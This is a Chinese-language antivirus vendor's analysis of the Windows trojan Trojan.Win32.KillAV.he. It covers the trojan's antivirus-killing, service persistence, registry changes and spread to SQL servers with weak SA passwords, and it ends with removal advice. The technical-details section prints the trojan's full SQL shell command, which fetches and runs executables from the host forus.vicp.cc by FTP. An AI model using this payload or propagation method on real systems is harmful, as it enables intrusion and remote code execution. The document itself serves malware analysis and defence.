木马程序 Trojan.Win32.KillAV.he

　　木马程序 Trojan.Win32.KillAV.he

　　该程序是一个用DELPHI编写的木马程序，并用UPX加壳来躲避杀毒软件查杀，加壳后长度为59,904 字节，图标为windows安装文件图标，病毒扩展名为exe，传播途径主要为释放木马，网络传播．

　　病毒分析

　　当病毒被执行后，将自身移动到系统根目录下并改名为NTDUBECT.EXE；修改系统时间，使大部分杀毒软件过期失效；遍历系统进程，将大部分杀毒软件进程终止，以达到突破杀毒软件的目的。利用命令行net stop关闭Windows安全中心、Windows防火墙及系统还原；在%USERPROFILE%Local SettingsTemp 文件夹下生成文件conime.exe并运行。

　　Conime.exe执行后在%SystemRoot%下新建目录“zh-CHS”，并在该目录下释放文件smss.exe； 并直接在%SystemRoot%下释放文件delbat.bat、ntsvc.ocx。调用SCM写注册表将病毒程序smss.exe注册成名为ASP.NET Services的服务,通过使用StartServiceA函数启动被注册的服务；调用regsvr32.exe将ntsvc.ocx控件注册，作为病毒辅助文件使用；delbat.bat用来删除临时文件夹下的conime.exe。

　　当计算机与网络连通后smss.exe会在 %SystemRoot%zh-CHS 目录下释放文件csrss.exe，该文件执行后会尝试扫描本机所处于网段中的所有IP地址，对所有开启SQL服务的计算机，尝试用SQL管理员SA及弱口令进行连接，若连接成功，则在该机器上执行SQL命令从“forus.vicp.cc”上下载病毒木马。Smss.exe使用勾子对病毒另一进程csrss.exe循环检测运行状态，若csrss.exe被停止，则立即执行csrss.exe。

　　技术细节

　　病毒执行的SQL命令为：

　　select * from openrowset('microsoft.jet.oledb.4.0',';database=

　　iasias.mdb','select shell("cmd /c net stop sharedaccess&

　　echo open forus.vicp.cc>2nd.sys&echo sys>>2nd.sys&echo 2008>>

　　2nd.sys&echo get new.exe>>2nd.sys&echo get me.exe>>

　　2nd.sys&echo bye>>2nd.sys&echo ftp -s:2nd.sys>xinbat.bat&echo start new.exe>>

　　xinbat.bat&echo start me.exe>>xinbat.bat&echo start new.exe>>

　　xinbat.bat&echo start me.exe>>xinbat.bat&echo del 2nd.sys>>

　　xinbat.bat&echo del%0>>xinbat.bat&xinbat.bat" )')

　　Delbat.bat文件内容为：

　　ping -n 1 127.0.0.1>nul

　　del C:DOCUME~1ADMINI~1LOCALS~1Tempconime.exe

　　del %0

　　exit

　　病毒新建的注册表项：

　　项：HKEY_CLASSES_ROOTCLSID{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}InprocServer32

　　键值：@

　　指向文件：C:WINNTsystem32 tsvc.ocx

　　项：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesaspnet_stata

　　键值：Start（服务启动方式）

　　数值数据：00000002

　　键值：ImagePath（服务映像路径）

　　数值数据：C:windowssystem32zh-CHSsmss.exe

　　键值：DisplayName（服务显示名称）

　　数值数据：ASP.NET Services

　　键值：ObjectName（服务对象名称）

　　数值数据：LocalSystem

　　安全提示

　　已安装使用微点主动防御软件的用户，无须任何设置，微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本，微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版，微点主动防御软件在发现该病毒后将报警提示您“发现未知木马”，请直接选择删除处理；

　　如果您已经将微点主动防御软件升级到最新版本，微点将报警提示您发现“Trojan.Win32.KillAV.he”，请直接选择删除。

　　对于未使用微点主动防御软件的用户，微点反病毒专家建议：

　　1、不要在不明站点下载非官方版本的软件进行安装，避免病毒通过捆绑的方式进入您的系统。

　　2、尽快将您的杀毒软件特征库升级到最新版本进行查杀，并开启防火墙拦截网络异常访问，如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。

　　3、开启windows自动更新，及时打好漏洞补丁。